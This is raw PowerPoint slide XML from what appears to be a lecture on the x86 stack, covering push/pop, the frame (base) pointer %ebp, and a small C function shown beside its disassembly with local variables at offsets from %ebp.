                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0xFFFC</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6839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="234136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a:off x="1168494" y="311398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78033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Stack Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US">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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34447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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>Garbage</a:t>
                      </a:r>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76</a:t>
            </a:fld>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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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3927318" y="2605048"/>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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="567369" y="5074404"/>
          <a:ext cx="3696160" cy="11125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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="234136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a:off x="1168494" y="311398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a:off x="1168494" y="277284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26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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions would like to use the stack to allocate space for their local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can we use the stack pointer for this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yes, however stack pointer can change throughout program execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame pointer points to the start of the function's frame on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each local variable will be (different) offsets of the frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In x86, frame pointer is called the base pointer, and is stored in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21346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0836" y="1579420"/>
            <a:ext cx="2507673" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>float</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  a = 10;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  b = 100;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  c = 10.45;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  a = a + b;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5112328" y="1600201"/>
            <a:ext cx="5832763" cy="475615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latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a @ </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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> – 0xc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b @ </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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>– 0x8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c @ </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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>– 0x4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0x4(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x8(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0xc(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038120" y="1579420"/>
            <a:ext cx="3074208" cy="422686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latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a @ </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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
